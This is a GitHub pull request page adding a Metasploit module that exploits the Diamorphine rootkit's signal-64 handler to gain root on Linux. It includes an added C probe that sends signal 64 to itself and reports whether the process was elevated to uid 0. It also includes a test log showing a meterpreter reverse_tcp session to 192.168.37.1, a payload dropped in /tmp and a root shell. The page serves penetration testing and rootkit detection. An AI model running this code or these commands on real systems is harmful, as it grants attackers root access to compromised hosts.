Add Diamorphine Rootkit Signal Privilege Escalation module #12942

Merged
merged 1 commit into rapid7:master from bcoles:diamorphine_rootkit_signal_priv_esc on Feb 19, 2020

Conversation

@bcoles bcoles commented Feb 16, 2020

Add Diamorphine Rootkit Signal Privilege Escalation module.

    This module uses Diamorphine rootkit's privesc feature using signal
    64 to elevate the privileges of arbitrary processes to UID 0 (root).

    This module has been tested successfully with Diamorphine from `master`
    branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Diamorphine's features, beyond simply leveraging the privesc signal to elevate privileges.

The value of this module is largely derived from the check method. If the rootkit has been configured to handle the default signal (64), then this module can also be leveraged by post/multi/recon/local_exploit_suggester to scan a host for Diamorphine while performing other privesc checks.
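The probe below is an added example, written for this page; it is not the Metasploit module's check method and not Diamorphine's code. It demonstrates the mechanism the PR description relies on: Diamorphine hooks the kill() system call and, when the signal number matches its compile-time SIGSUPER (64 by default, as the page states), elevates the calling process to uid 0 instead of delivering the signal. The example assumes that behaviour and two things the page does not spell out: that a clean Linux kernel treats signal 64 as SIGRTMAX (default action: terminate), so a handler must be installed before probing or the process simply dies, and that a hooked kill() returns without queueing the signal, so "handler never ran" is itself a signal of interception. The names DIAMORPHINE_SIGSUPER, diamorphine_probe and probe_result are this example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Diamorphine's default privesc signal (SIGSUPER). It is a compile-time
 * constant in the rootkit, so a deployment may use a different number;
 * the probe takes the signal as a parameter for that reason. */
#define DIAMORPHINE_SIGSUPER 64

enum probe_verdict {
    PROBE_CLEAN = 0,     /* signal reached our handler, credentials unchanged */
    PROBE_ELEVATED = 1,  /* euid became 0: kill() is hooked and privesc works */
    PROBE_SWALLOWED = 2, /* signal never delivered, uid unchanged: kill() hooked
                            but we were already root, or some other interception */
    PROBE_ERROR = -1
};

struct probe_result {
    uid_t euid_before;
    uid_t euid_after;
    int handler_ran;
    enum probe_verdict verdict;
};

static volatile sig_atomic_t g_sig_delivered = 0;

static void on_probe_signal(int signo)
{
    (void)signo;
    g_sig_delivered = 1;
}

/* Send `signo` to ourselves and observe what the kernel did with it.
 *
 * A handler is installed first: on a clean kernel signal 64 is SIGRTMAX,
 * whose default action terminates the process, so a bare `kill -64 $$`
 * as a "test" would kill the shell. With Diamorphine loaded the hooked
 * sys_kill returns without queueing the signal, so the handler does not
 * run and the caller's credentials are switched to uid 0 instead. */
int diamorphine_probe(int signo, struct probe_result *out)
{
    struct sigaction sa, old;

    memset(out, 0, sizeof *out);
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_probe_signal;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;

    g_sig_delivered = 0;
    if (sigaction(signo, &sa, &old) != 0) {
        out->verdict = PROBE_ERROR;
        return PROBE_ERROR;
    }

    out->euid_before = geteuid();
    /* For a single-threaded process POSIX guarantees that an unblocked
     * signal sent to itself is delivered before kill() returns, so the
     * flag is final once we get past this call. */
    if (kill(getpid(), signo) != 0) {
        sigaction(signo, &old, NULL);
        out->verdict = PROBE_ERROR;
        return PROBE_ERROR;
    }
    out->euid_after = geteuid();
    out->handler_ran = g_sig_delivered;

    sigaction(signo, &old, NULL); /* restore the previous disposition */

    if (out->euid_before != 0 && out->euid_after == 0)
        out->verdict = PROBE_ELEVATED;
    else if (!out->handler_ran)
        out->verdict = PROBE_SWALLOWED;
    else
        out->verdict = PROBE_CLEAN;
    return out->verdict;
}

int main(void)
{
    struct probe_result r;
    int v = diamorphine_probe(DIAMORPHINE_SIGSUPER, &r);

    printf("euid before=%u after=%u handler_ran=%d\n",
           (unsigned)r.euid_before, (unsigned)r.euid_after, r.handler_ran);
    switch (v) {
    case PROBE_ELEVATED:
        puts("Diamorphine-style kill() hook present: caller elevated to uid 0");
        break;
    case PROBE_SWALLOWED:
        puts("signal intercepted but no uid change (already root?): investigate");
        break;
    case PROBE_CLEAN:
        puts("signal delivered normally: no hook on this signal");
        break;
    default:
        perror("probe failed");
    }
    return v == PROBE_ERROR ? 1 : 0;
}
```

Run it as an unprivileged user: on a clean host the handler fires and the verdict is PROBE_CLEAN; on a host with Diamorphine handling the default signal the process comes back with euid 0 and the handler never runs. If the deployment was built with a different SIGSUPER, pass that number instead of 64. Note that a positive result has already elevated the probing process, so a detection-only workflow should treat the probe as destructive and log that fact.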

@space-r7 space-r7 self-assigned this Feb 19, 2020
space-r7 added a commit that referenced this pull request Feb 19, 2020
@space-r7 space-r7 merged commit ac6d0e4 into rapid7:master Feb 19, 2020
@space-r7

Tested on Ubuntu 16.04 with latest version of Diamorphine:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (3021284 bytes) to 192.168.37.132
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.132:58874) at 2020-02-19 10:15:00 -0600

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.132
OS           : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc 
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check
[+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'.
msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Writing '/tmp/.EynpqzLyrx' (250 bytes) ...
[*] Sending stage (3021284 bytes) to 192.168.37.132
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.132:58876) at 2020-02-19 10:18:45 -0600
[+] Deleted /tmp/.EynpqzLyrx

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.37.132
OS           : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

space-r7 commented Feb 19, 2020

Release Notes

This adds a local exploit module that gains root privileges on systems with the Diamorphine rootkit. The module leverages the elevate signal, typically signal 64, to elevate privileges to root.

@bcoles bcoles deleted the diamorphine_rootkit_signal_priv_esc branch February 20, 2020 00:53
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 20, 2020
Labels
docs module rn-modules release notes for new or majorly enhanced modules